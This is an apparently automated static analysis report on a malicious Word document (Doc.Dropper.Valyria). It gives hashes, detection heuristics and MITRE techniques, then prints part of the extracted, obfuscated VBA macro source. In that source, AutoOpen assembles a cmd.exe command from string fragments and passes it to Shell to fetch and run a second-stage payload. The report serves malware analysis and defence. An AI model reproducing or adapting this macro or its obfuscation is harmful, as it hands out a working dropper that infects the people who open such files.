Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d141d90213f2a5cb…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 102.0 KB
Created: 2018-08-09 08:44:00
Authoring application: Microsoft Office Word
First seen: 2018-08-26
MD5: 93b608e9ba6664ed6068366fa4118090
SHA-1: 7c3e8780bd75fc07f254798d0b4797e4ceef0937
SHA-256: d141d90213f2a5cbc84cab94e8575dfa19ce9f0d8b5b7c76e42026bad77d138c
Risk score: 142

Malware Insights

MITRE ATT&CK
T1059.005 (Visual Basic), T1204.002 (Malicious File)

The sample is a malicious Word document containing a VBA macro. The AutoOpen macro concatenates obfuscated string fragments into a command line and passes it to Shell; the resulting command appears intended to download and execute a second-stage payload. The macro's obfuscation and the presence of legacy WordBasic auto-exec markers suggest downloader or dropper functionality.

Heuristics (5)

  • ClamAV: Doc.Dropper.Valyria-6667201-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Valyria-6667201-0
  • VBA macros detected [medium] (1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10091 bytes
SHA-256: 9d714c897f906b64c0280b696e949ee822b4fd8b85c7eca9de2a8fc20cf938cf
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "rWpjZftTqY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName Sqr(83597 - qSvBi + VMZpZE * ZCusv)
   TypeName aXwcW
   TypeName Sijvf
   TypeName Round(381500289)
Shell@ KeyString(vbKeyC) + iKwEjPuFRhQld + rUhMRLpukLUw + QSiqciwAhTq + HJHpqsQrEU + IrELUXZo + NjdZCHJOJ + aLcuEc + vOjWjt + hcfqW + YzfwdKfftc + HppbipQN, 665107699 - 665107699
   TypeName CByte(22782 - clwDk * 80832 + QSAAIN)
   TypeName Tan(29487 * jFfbT)
   TypeName ChrB(24765 / oqTBs)
End Sub
Attribute VB_Name = "bMfCKiGvpuM"
Function QSiqciwAhTq()
On Error Resume Next
TypeName Sin(szzsCr)
   TypeName 508345650
   TypeName 387
SJMofbtv = "md" + " /V" + "/C" + CStr(Chr(ZHFvatTRwj + zHTjtXj + 34 + PYTGjnNtWtfvkC + SwzzcOVnDMC)) + "s" + "et " + "; " + "   " + "=EVL" + "in" + "i" + "DkEU" + "m"
TypeName Int(5531)
   TypeName Fix(14329 * JjFmY * 38925 + lVWLD)
   TypeName Sqr(aRzTn / RNYBKW)
wDzfrCu = "K" + "d" + "Ba" + "pnL" + "mSCU" + "EWUj" + "N" + "."
TypeName TwAJi
   TypeName qjZcTS
BCuarUknh = "8" + "wv(" + "=,2" + "$f-u" + "hZoT" + "Ht4{" + "Mr" + "gbs" + "A6;'" + "):" + "5c}" + "Pe" + " +F"
TypeName Tan(ujSktj)
   TypeName Chr(kwIEc)
MtLuzITXX = "3\/" + "x@" + "Gl" + "y&&f" + "or" + " %9" + " in" + " " + "(1"
TypeName PiUcEd
   TypeName ChrW(75619699)
   TypeName Cos(IDPCt - BiGnOJ)
msCBbn = "5;41" + ";29;" + "62" + ";48;" + "5" + "1"
TypeName Sqr(YmQiOi)
   TypeName 3171
   TypeName 16
qQHSN = ";" + "39" + ";6" + "2;" + "72;" + "72" + ";6"
QSiqciwAhTq = SJMofbtv + wDzfrCu + BCuarUknh + MtLuzITXX + msCBbn + qQHSN
   TypeName Sin(33870 / FDmAF + CntzL / BsVHZb)
   TypeName Round(1)
End Function
Function HJHpqsQrEU()
On Error Resume Next
TypeName Atn(859)
   TypeName 36
   TypeName 888
zLuainzR = "3" + ";35" + ";7;4" + "7;16" + ";32;"
TypeName 2
   TypeName Chr(666)
   TypeName Sqr(3)
KiZVcEcmUMO = "1" + "6" + ";62;" + "29;3" + "7;4" + "1;5" + "0;2" + "5;6" + "2;59" + ";" + "44;6"
TypeName 590
   TypeName Atn(BjkJf - bzMwjt / 68004 / mkYJH)
SVBwhilbM = "3;" + "26" + ";62" + ";44;" + "27;" + "23;" + "62;"
TypeName 4
   TypeName CDbl(67)
jjZopavu = "50;" + "20;7" + "2;5" + ";6" + "2;" + "16"
TypeName 5
   TypeName PfNjw
   TypeName Int(2)
WbPUQRQlvb = ";44;" + "54" + ";35;" + "3" + "6" + ";" + "40;" + "2" + "5;3" + "2;5"
TypeName 3124
   TypeName 9901
wTBiJjV = "5;3" + "9" + ";4" + "4;44" + ";1" + "5;57" + ";6" + "8;6" + "8" + ";" + "44;" + "6"
TypeName 683
   TypeName CLng(7)
   TypeName 148
YtMfW = "2;59" + ";" + "39" + ";51" + ";5" + ";51;" + "4" + "4"
TypeName 6516
   TypeName FIWzDi
EHifWRJU = ";5" + "1;41" + ";72" + ";38" + ";44;" + "5;" + "41;1" + "6;" + "27" + ";59" + ";4"
TypeName jEClRO
   TypeName Cos(454379937)
kupTHqW = "1;1" + "8;68" + ";43" + ";24;" + "58;7" + "0;"
TypeName mjwkJE
   TypeName 106
   TypeName Fix(250506103)
wpYjVrbElt = "39;" + "44" + ";44" + ";15" + ";57;" + "6" + "8;" + "68;2" + "9;29"
TypeName CByte(iGplJ)
   TypeName YLwFU
lInTw = ";2" + "9;2" + "7;51" + ";38" + ";16" + ";12" + ";14;" + "73" + ";1" + "5;7" + "2;" + "14;1" + "6;16"
TypeName Round(9)
   TypeName ChrW(9107)
   TypeName nCOhG
YZwFLiZEpA = ";" + "5;16" + ";" + "49" + ";27" + ";59" + ";41;" + "1" + "8;" + "6" + "8;6"
TypeName Sqr(66)
   TypeName ChrB(14535 * MsuAn + bBzNA - ACkGz)
   TypeName 890
HSGwAZiQZC = "5;" + "17;3" + "6;5" + "3;3" + "4;7" + "0;" + "39;4"
HJHpqsQrEU = zLuainzR + KiZVcEcmUMO + SVBwhilbM + jjZopavu + WbPUQRQlvb + wTBiJjV + YtMfW + EHifWRJU + kupTHqW + wpYjVrbElt + lInTw + YZwFLiZEpA + HSGwAZiQZC
   TypeName CLng(47123 + ckuQbl)
   TypeName CBool(zmBpF - RwSzcK * 66631 / YiCLw)
   TypeName JmNzj
End Function
Function IrELUXZo()
On Error Resume Next
TypeName XvpZs
   TypeName 12
baKJBAv = "4" + ";44" + ";" + "15;5" + "7" + ";68" + ";68;" + "51;3" + "9;3" + "8;1" + "4;" + "1" + "
... (truncated)